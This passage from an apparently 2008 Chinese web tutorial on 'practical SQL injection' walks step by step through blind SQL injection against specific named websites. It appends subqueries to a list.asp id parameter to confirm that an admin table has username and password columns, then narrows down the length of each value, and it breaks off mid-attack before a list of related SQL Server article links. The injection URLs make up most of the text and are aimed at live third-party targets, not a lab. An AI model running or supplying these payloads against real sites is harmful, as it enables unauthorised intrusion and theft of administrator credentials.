给大家发一个SQL注入实战教程吧
2008-10-27 16:51:38 来源:WEB开发网没有返回错误信息.又也没有返回文章,提示找不到相应文章
证明:在admin中存在username这个字段.
只是用户名不是qqq
猜密码的字段名
http://www.shbbs.net/Article/list.asp?id=974 and 1=(select min(id) from admin where passwd='qqq')
返回错误信息,表示没有passwd这个密码字段名
再来~~
http://www.shbbs.net/Article/list.asp?id=974 and 1=(select min(id) from admin where
password='qqq')
没有返回错误信息.也没有返回文章.提示找不到相应文章.
证明:在admin中存在password这个字段.
只是密码不是qqq
现在就来猜用户字段名长度
http://www.shbbs.net/Article/list.asp?id=974 and 1=(select min(id) from admin where
len(username)>8)
正确~~
http://www.xuanke.com/wz/list.asp?id=47 and 1=(select min(id) from admin where len(username)<15)
正确~~
用户名长度 大于8 小于15
http://www.shbbs.net/Article/list.asp?id=974 and 1=(select min(id) from admin where
len(username)=10)
呵呵~~用户名长度为10位``~~
猜密码长度
http://www.shbbs.net/Article/list.asp?id=974 and 1=(select min(id) from admin where
len(password)>8)
正确~~
http://www.shbbs.net/Article/list.asp?id=974 and 1=(select min(id) from admin where
len(password)<15)
正确~~~
密码长度也是 大于8 小于15
http://www.shbbs.net/Article/list.asp?id=974 and 1=(select min(id) from admin where
- ››sql server自动生成批量执行SQL脚本的批处理
- ››sql server 2008亿万数据性能优化
- ››SQL Server 2008清空数据库日志方法
- ››sqlserver安装和简单的使用
- ››SQL Sever 2008 R2 数据库管理
- ››SQL SERVER无法安装成功,sqlstp.log文件提示[未发...
- ››Sql Server中通过父记录查找出所有关联的子记录
- ››SqlServer触发器、存储过程和函数
- ››SQL Server 中的事务(含义,属性,管理)
- ››Sqlite数据库插入和读取图片数据
- ››Sql server 2005拒绝了对对象 'xx表' (数...
- ››Sql server 2005拒绝了对对象 'xx表' (数...
更多精彩
赞助商链接